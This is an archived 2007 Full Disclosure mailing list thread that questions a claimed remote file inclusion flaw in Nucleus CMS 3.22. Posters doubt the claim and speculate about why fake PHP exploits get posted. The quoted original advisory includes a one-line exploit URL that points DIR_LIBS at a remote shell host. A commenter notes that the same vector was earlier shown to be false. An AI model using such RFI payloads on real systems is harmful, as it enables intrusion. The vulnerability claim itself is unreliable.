Full Disclosure mailing list archives
Re: nucleus 3.22 >> RFI
From: "Ron Superior" <rsuperior () gmail com>
Date: Mon, 7 May 2007 14:12:49 -0400
Hi folks, Some months back I seem to remember people hypothesizing as to the real purpose behind some of these particularly lame fake PHP exploits. You know the ones I mean; they're mostly remote file includes, they often are decorated with some simple ASCII art, and the "thanks" and "greetz" sections are always loaded with names that suggest Turkish or other Middle Eastern origin. The two most interesting suggestions that I recall were: 1) Somebody wanted to pump up the lists with PHP exploits so they could claim later that some large number X of PHP vulnerabilities had been posted to FD since some date. 2) Covert communication, or that the "exploits" were really secret messages between t3rr0ri$ts or something. I'm sure there exists a motive beyond just spamming us to be annoying. Any one have any new ideas, or good arguments for either of the above two ideas? Ron Guasconi Vincent wrote:
On 5/6/07, security curmudgeon <jericho () attrition org> wrote:: VENDOR :http://nucleuscms.org/ : BY : s3rv3r_hack3r (hackerz.ir admin) : bug: : nucleus3.22/nucleus/plugins/skinfiles/index.php =
include($DIR_LIBS . 'PLUGINADMIN.php');
: Exloit: : http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell I haven't examined the source code to this, but on June 16, 2006, gamr-14 () hotmail com disclosed RFI vulnerabilities [1] in four Nucleus scripts, all with the DIR_LIBS variable as the injection point. This was subsequently proven to be a false report as the variable was previously set and could not be manipulated by an attacker. Have you actually tested this, or is this based on a quick grep of the source code?They're like bots now. They didn't hear you, and you can't stop them. Try a spam rule.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: nucleus 3.22 >> RFI Guasconi Vincent (May 07)
- <Possible follow-ups>
- Re: nucleus 3.22 >> RFI Ron Superior (May 07)
- Re: nucleus 3.22 >> RFI evilrabbi (May 08)